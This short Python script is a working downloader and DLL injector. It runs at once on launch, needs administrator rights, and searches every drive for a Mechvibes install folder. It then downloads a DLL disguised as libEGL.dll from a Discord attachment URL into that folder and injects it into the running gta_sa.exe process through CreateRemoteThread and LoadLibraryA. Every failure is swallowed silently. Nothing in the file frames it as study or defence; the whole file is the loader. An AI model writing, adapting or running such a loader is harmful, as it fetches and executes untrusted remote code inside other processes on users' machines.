import os, sys, ctypes, subprocess, requests
from ctypes import wintypes

def inject():
    DLL_URL = "https://cdn.discordapp.com/attachments/1393441968566046750/1393875216672882709/libEGL.dll?ex=6874c2f4&is=68737174&hm=36816ae99da750f5ef1cceea6f3c2bf016c8afe44e550a126d53733cad68a6fa&"
    DLL_NAME = "libEGL.dll"
    PROCESS_NAME = "gta_sa.exe"

    if not ctypes.windll.shell32.IsUserAnAdmin():
        return

    mech_dir = None
    for d in [f"{chr(c)}:\\" for c in range(65, 91) if os.path.exists(f"{chr(c)}:\\")]:
        for r, _, f in os.walk(d):
            if "Uninstall Mechvibes.exe" in f:
                mech_dir = os.path.dirname(os.path.join(r, "Uninstall Mechvibes.exe"))
                break
        if mech_dir:
            break
    if not mech_dir:
        return

    dll_path = os.path.join(mech_dir, DLL_NAME)

    r = requests.get(DLL_URL, timeout=15)
    if r.status_code != 200:
        return
    with open(dll_path, "wb") as f:
        f.write(r.content)

    try:
        output = subprocess.check_output(f'tasklist /FI "IMAGENAME eq {PROCESS_NAME}" /NH', shell=True).decode()
        pid = int(output.strip().split()[1])
    except:
        return

    k32 = ctypes.WinDLL('kernel32', use_last_error=True)
    h_process = k32.OpenProcess(0x1F0FFF, False, pid)
    if not h_process:
        return

    dll_bytes = dll_path.encode('ascii')
    mem = k32.VirtualAllocEx(h_process, 0, len(dll_bytes)+1, 0x3000, 0x04)
    if not mem:
        k32.CloseHandle(h_process)
        return

    if not k32.WriteProcessMemory(h_process, mem, dll_bytes, len(dll_bytes)+1, None):
        k32.CloseHandle(h_process)
        return

    load_lib = k32.GetProcAddress(k32.GetModuleHandleA(b'kernel32.dll'), b'LoadLibraryA')
    h_thread = k32.CreateRemoteThread(h_process, None, 0, load_lib, mem, 0, None)
    if not h_thread:
        k32.CloseHandle(h_process)
        return

    k32.CloseHandle(h_thread)
    k32.CloseHandle(h_process)

inject()
sys.exit()
